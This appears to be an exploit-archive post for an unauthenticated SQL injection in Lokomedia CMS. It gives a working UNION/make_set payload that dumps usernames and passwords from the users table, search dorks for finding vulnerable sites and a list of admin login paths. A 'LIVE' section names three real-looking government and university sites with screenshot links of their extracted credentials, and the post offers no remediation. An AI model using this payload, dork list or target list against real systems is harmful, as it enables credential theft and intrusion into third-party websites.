Home / os / win10

Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###########################

# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

###########################

=========================================================
[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://www.bukulokomedia.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote exploit
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack 
[+] Contact :- aurorakoizora@gmail.com

=========================================================
[+] Severity Level :- Medium

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- id,
      statis-1-profil.html (string ) 
      statis-3-strukturorganisasi.html (string )
      statis-1-visimisi.html (string)
      statis-1-tujuan.html  (string)

[+] Dork : - 
      statis-1-profil.html (work100% ) 
      statis-3-strukturorganisasi.html (work100% )
      statis-1-visimisi.html (work100%)
      statis-1-tujuan.html  (work100%)

[+] Local Admin 
     /redaktur
     /adminweb
     /administrator
     /redaktur/index.php
     /adminlogin
     /admin
     /login.php

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File :- /home/user/public_html/XXX.php

[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html
              - http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html
              - http://127.0.0.1/statis-1( exploit-code )visimisi.html
              - http://127.0.0.1/statis-1( exploit-code )tujuan.html

########################################################

[+] Exploit 

/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

##########################################################

[+] Testing 
 
http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html

[+] NOTE 

 username & password open on title-bar  or  CTRL+U for view username & password this website exploit

###########################################################

[+] LIVE 

http://portal.ukit.ac.id ( Title-bar  http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png )
http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )
http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )
</BODY></HTML>

 

TOP

Malware :

Exploits :